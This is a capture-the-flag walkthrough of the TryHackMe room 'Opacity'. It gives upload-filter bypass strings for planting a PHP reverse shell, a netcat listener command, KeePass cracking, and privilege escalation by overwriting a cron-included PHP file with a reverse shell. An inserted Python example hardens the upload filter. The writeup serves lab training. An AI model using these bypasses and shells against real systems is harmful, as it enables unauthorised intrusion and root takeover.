TryHackMe - Opacity - Writeup


https://tryhackme.com/room/opacity

Let's kick off our enumeration with an nmap and gobuster scan.

When we check out the HTTP website on port 80, we are greeted with a login page. I tried the typical default credentials to no avail.


Let's pivot our efforts and navigate to /cloud. 

We have a potential entry point. Immediately I tried uploading a PHP reverse shell. This did not work due to the file upload restrictions that are in place. I then tried to upload a random .jpg from my machine and this worked.

There are a couple of easy ways to bypass the file upload restrictions and upload our reverse shell. The easiest is to simply add a space before the second extension, like this: "http://<IP>:<PORT>/php-reverse-shell.php .jpg". This causes the website to accept our PHP file while ignoring the .jpg extension, so the reverse shell is executed. Another method is to add a null byte between .php and .jpg, like this: "http://<IP>:<PORT>/php-reverse-shell.php%00.jpg".
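To show why both bypasses above get past a check that only looks at the tail of the name, and what a safer upload filter looks like, here is an added Python example (not code from the room or this writeup). The weak check and the fetcher model are assumptions about the behaviour described above, and the IP and port in the test URLs are constructed.

```python
import os
import re
import secrets
from typing import Optional
from urllib.parse import unquote

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
JPEG_MAGIC = b"\xff\xd8\xff"


def weak_accepts(url: str) -> bool:
    """Hypothetical weak filter: accept if the decoded name merely ends
    with an allowlisted extension, ignoring everything before it."""
    name = unquote(url).lower()
    return name.rsplit(".", 1)[-1] in ALLOWED_EXT


def weak_stored_name(url: str) -> str:
    """Hypothetical model of the fetcher that treats whitespace or a NUL
    byte as the end of the name, which silently drops the trailing .jpg."""
    head = re.split(r"[\s\x00]", unquote(url), maxsplit=1)[0]
    return head.rsplit("/", 1)[-1]


def hardened_name(url: str, content: bytes) -> Optional[str]:
    """Return a server-chosen filename for storage, or None to reject.

    Validates the whole name rather than its tail: one label, one dot,
    one extension, no whitespace or control bytes; then checks the
    extension against the allowlist and the content against magic bytes.
    """
    name = os.path.basename(unquote(url))
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", name):
        return None
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    if ext in ("jpg", "jpeg") and not content.startswith(JPEG_MAGIC):
        return None
    # Never reuse the client-supplied name on disk: random name + allowlisted ext.
    return f"{secrets.token_hex(8)}.{ext}"
```

Renaming on the server also removes any dependence on how a later fetch or cron job tokenises the original filename.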

Start a simple python server and a netcat listener on your attacking machine in two separate terminals:

python3 -m http.server 8080

nc -nlvp <REVSHELL PORT>

Using one of the two file upload restriction bypass techniques from above, upload your file, then navigate to the "IMAGE LINK" URL given to you by the website. (Ensure that you remove the ".jpg" when navigating to this URL.)

It took a handful of attempts at uploading revshell.php to obtain my reverse shell. Now that we have our reverse shell, let's upgrade it to a fully interactive TTY. We do this so that we can utilize all of the features of a fully interactive shell (sudo, nano, tab completion, etc.): https://zweilosec.github.io/posts/upgrade-linux-shell/clear

After exploring the file system I discovered a KeePass password database in /opt. Let's download this to our attacking box and try to crack it with John the Ripper.

From here we can utilize https://app.keeweb.info/ to access the database.

We can use SSH with these credentials to log in as sysadmin.


We can find the local.txt flag in sysadmin's home directory!


In the home directory there is also a scripts directory. Let's check that out.


If you remember from earlier, when we uploaded our reverse shell it was deleted shortly after upload. The /cloud web page also mentions "5 minutes file upload". The contents of this script show that it is what deletes the uploaded files, which means that it runs every couple of minutes.

Additionally, we can see that the user "sysadmin" owns the sub-directory "lib", which contains the file "backup.inc.php". We can exploit this by copying this file to our home directory, replacing its contents with a reverse shell, deleting the file in "/lib" and copying our malicious version back into the lib directory.



Start your reverse shell listener and wait one minute.

This room was incredibly fun and required me to expand on my scripting knowledge. I had to spend time really understanding how these scripts worked in order to exploit them.